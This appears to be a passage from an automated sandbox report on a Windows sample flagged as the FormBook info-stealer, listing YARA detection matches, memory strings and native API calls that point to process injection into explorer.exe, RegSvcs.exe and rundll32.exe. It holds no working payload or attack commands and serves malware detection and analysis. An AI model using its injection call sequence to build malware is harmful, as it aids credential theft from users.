Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.4589368880.000000000E3AE000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe PID: 6316, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: KfYvtUBOq.exe PID: 3360, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: Process Memory Space: RegSvcs.exe PID: 5224, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 3236, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Windows\explorer.exe	Code function: 9_2_0E396232 NtCreateFile,	9_2_0E396232
Source: C:\Windows\explorer.exe	Code function: 9_2_0E397E12 NtProtectVirtualMemory,	9_2_0E397E12
Source: C:\Windows\explorer.exe	Code function: 9_2_0E397E0A NtProtectVirtualMemory,	9_2_0E397E0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041A370 NtCreateFile,	13_2_0041A370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041A420 NtReadFile,	13_2_0041A420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041A4A0 NtClose,	13_2_0041A4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041A550 NtAllocateVirtualMemory,	13_2_0041A550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041A41C NtReadFile,	13_2_0041A41C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041A49A NtClose,	13_2_0041A49A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282B60 NtClose,LdrInitializeThunk,	13_2_01282B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	13_2_01282BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282AD0 NtReadFile,LdrInitializeThunk,	13_2_01282AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282D30 NtUnmapViewOfSection,LdrInitializeThunk,	13_2_01282D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282D10 NtMapViewOfSection,LdrInitializeThunk,	13_2_01282D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282DF0 NtQuerySystemInformation,LdrInitializeThunk,	13_2_01282DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282DD0 NtDelayExecution,LdrInitializeThunk,	13_2_01282DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282C70 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_01282C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282CA0 NtQueryInformationToken,LdrInitializeThunk,	13_2_01282CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282F30 NtCreateSection,LdrInitializeThunk,	13_2_01282F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282FB0 NtResumeThread,LdrInitializeThunk,	13_2_01282FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282F90 NtProtectVirtualMemory,LdrInitializeThunk,	13_2_01282F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282FE0 NtCreateFile,LdrInitializeThunk,	13_2_01282FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	13_2_01282EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282E80 NtReadVirtualMemory,LdrInitializeThunk,	13_2_01282E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01284340 NtSetContextThread,	13_2_01284340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01284650 NtSuspendThread,	13_2_01284650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282BA0 NtEnumerateValueKey,	13_2_01282BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282B80 NtQueryInformationFile,	13_2_01282B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282BE0 NtQueryValueKey,	13_2_01282BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282AB0 NtWaitForSingleObject,	13_2_01282AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282AF0 NtWriteFile,	13_2_01282AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282D00 NtSetInformationFile,	13_2_01282D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282DB0 NtEnumerateKey,	13_2_01282DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282C00 NtQueryInformationProcess,	13_2_01282C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282C60 NtCreateKey,	13_2_01282C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282CF0 NtOpenProcess,	13_2_01282CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282CC0 NtQueryVirtualMemory,	13_2_01282CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282F60 NtCreateProcessEx,	13_2_01282F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282FA0 NtQuerySection,	13_2_01282FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282E30 NtWriteVirtualMemory,	13_2_01282E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282EE0 NtQueueApcThread,	13_2_01282EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01283010 NtOpenDirectoryObject,	13_2_01283010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01283090 NtSetValueKey,	13_2_01283090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012835C0 NtCreateMutant,	13_2_012835C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012839B0 NtGetContextThread,	13_2_012839B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01283D10 NtOpenProcessToken,	13_2_01283D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01283D70 NtOpenThread,	13_2_01283D70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00725CF1 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,	15_2_00725CF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_007240B1 NtQuerySystemInformation,	15_2_007240B1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00725D6A NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,	15_2_00725D6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00724136 HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,	15_2_00724136
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82CA0 NtQueryInformationToken,LdrInitializeThunk,	15_2_04C82CA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82C60 NtCreateKey,LdrInitializeThunk,	15_2_04C82C60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82C70 NtFreeVirtualMemory,LdrInitializeThunk,	15_2_04C82C70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82DD0 NtDelayExecution,LdrInitializeThunk,	15_2_04C82DD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82DF0 NtQuerySystemInformation,LdrInitializeThunk,	15_2_04C82DF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82D10 NtMapViewOfSection,LdrInitializeThunk,	15_2_04C82D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	15_2_04C82EA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82FE0 NtCreateFile,LdrInitializeThunk,	15_2_04C82FE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82F30 NtCreateSection,LdrInitializeThunk,	15_2_04C82F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82AD0 NtReadFile,LdrInitializeThunk,	15_2_04C82AD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82BE0 NtQueryValueKey,LdrInitializeThunk,	15_2_04C82BE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	15_2_04C82BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82B60 NtClose,LdrInitializeThunk,	15_2_04C82B60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C835C0 NtCreateMutant,LdrInitializeThunk,	15_2_04C835C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C84650 NtSuspendThread,	15_2_04C84650
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C84340 NtSetContextThread,	15_2_04C84340
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82CC0 NtQueryVirtualMemory,	15_2_04C82CC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82CF0 NtOpenProcess,	15_2_04C82CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82C00 NtQueryInformationProcess,	15_2_04C82C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82DB0 NtEnumerateKey,	15_2_04C82DB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82D00 NtSetInformationFile,	15_2_04C82D00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82D30 NtUnmapViewOfSection,	15_2_04C82D30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82EE0 NtQueueApcThread,	15_2_04C82EE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82E80 NtReadVirtualMemory,	15_2_04C82E80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82E30 NtWriteVirtualMemory,	15_2_04C82E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82F90 NtProtectVirtualMemory,	15_2_04C82F90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82FA0 NtQuerySection,	15_2_04C82FA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82FB0 NtResumeThread,	15_2_04C82FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82F60 NtCreateProcessEx,	15_2_04C82F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82AF0 NtWriteFile,	15_2_04C82AF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82AB0 NtWaitForSingleObject,	15_2_04C82AB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82B80 NtQueryInformationFile,	15_2_04C82B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82BA0 NtEnumerateValueKey,	15_2_04C82BA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C83090 NtSetValueKey,	15_2_04C83090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C83010 NtOpenDirectoryObject,	15_2_04C83010
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C83D70 NtOpenThread,	15_2_04C83D70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C83D10 NtOpenProcessToken,	15_2_04C83D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C839B0 NtGetContextThread,	15_2_04C839B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6A370 NtCreateFile,	15_2_02B6A370
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6A4A0 NtClose,	15_2_02B6A4A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6A420 NtReadFile,	15_2_02B6A420
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6A550 NtAllocateVirtualMemory,	15_2_02B6A550
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6A49A NtClose,	15_2_02B6A49A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6A41C NtReadFile,	15_2_02B6A41C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AAA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,	15_2_04AAA036
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	15_2_04AA9BAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AAA042 NtQueryInformationProcess,	15_2_04AAA042
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	15_2_04AA9BB2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_02B6D5DC	0_2_02B6D5DC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07309668	0_2_07309668
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07309658	0_2_07309658
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07300400	0_2_07300400
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_073003F0	0_2_073003F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07307E60	0_2_07307E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07309ED8	0_2_07309ED8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07307A28	0_2_07307A28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07309AA0	0_2_07309AA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07309A90	0_2_07309A90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_0BEF1118	0_2_0BEF1118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130100	7_2_01130100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01186000	7_2_01186000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E3F0	7_2_0114E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011C02C0	7_2_011C02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011965B2	7_2_011965B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011965D0	7_2_011965D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01164750	7_2_01164750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115C6E0	7_2_0115C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01156962	7_2_01156962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114A840	7_2_0114A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01178890	7_2_01178890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011268F1	7_2_011268F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E8F0	7_2_0116E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142A45	7_2_01142A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114AD00	7_2_0114AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114ED7A	7_2_0114ED7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01158DBF	7_2_01158DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01148DC0	7_2_01148DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140C00	7_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130CF2	7_2_01130CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01160F30	7_2_01160F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01182F28	7_2_01182F28
